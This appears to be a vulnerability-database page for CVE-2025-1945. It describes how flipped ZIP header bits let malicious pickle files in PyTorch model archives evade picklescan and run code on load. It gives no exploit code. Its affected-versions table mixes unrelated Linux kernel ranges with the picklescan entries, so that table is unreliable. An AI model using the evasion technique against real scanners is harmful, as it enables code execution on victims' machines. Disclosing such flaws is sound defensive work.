cbcvebase.
CVE-2025-1945
published 2025-03-10

CVE-2025-1945: picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives when certain ZIP file flag bits are modified. By flipping…

PriorityP353critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
0.51%
39.7th percentile
picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives when certain ZIP file flag bits are modified. By flipping specific bits in the ZIP file headers, an attacker can embed malicious pickle files that remain undetected by PickleScan while still being successfully loaded by PyTorch's torch.load(). This can lead to arbitrary code execution when loading a compromised model.

Affected

12 ranges
VendorProductVersion rangeFixed in
linuxlinux_kernel>= 2.6.35 < 5.4.3015.4.301
linuxlinux_kernel>= 5.11.0 < 5.15.1955.15.195
linuxlinux_kernel>= 5.16.0 < 6.1.1566.1.156
linuxlinux_kernel>= 5.5.0 < 5.10.2465.10.246
linuxlinux_kernel>= 6.13.0 < 6.16.116.16.11
linuxlinux_kernel>= 6.17.0 < 6.17.16.17.1
linuxlinux_kernel>= 6.2.0 < 6.6.1106.6.110
linuxlinux_kernel>= 6.7.0 < 6.12.516.12.51
mmaitre314picklescan< 0.0.230.0.23
mmaitre314picklescan>= 0 < e58e45e0d9e091159c1554f9b04828bbb40b9781e58e45e0d9e091159c1554f9b04828bbb40b9781
mmaitre314picklescan>= 0 < 0.0.230.0.23
mmaitre314picklescan>= 0.0.1 < 0.0.230.0.23

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.05.3MEDIUMCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vendor_redhat7.0MEDIUM
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.